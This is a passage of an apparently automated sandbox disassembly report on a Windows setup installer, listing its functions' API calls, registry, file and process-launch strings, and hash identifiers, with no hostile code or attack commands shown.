                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3734993849-2769509956
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0001AA00,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                • String ID: *?|<>/":
                                                                                                                                                                                                                                                                • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID: $@rD
                                                                                                                                                                                                                                                                • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
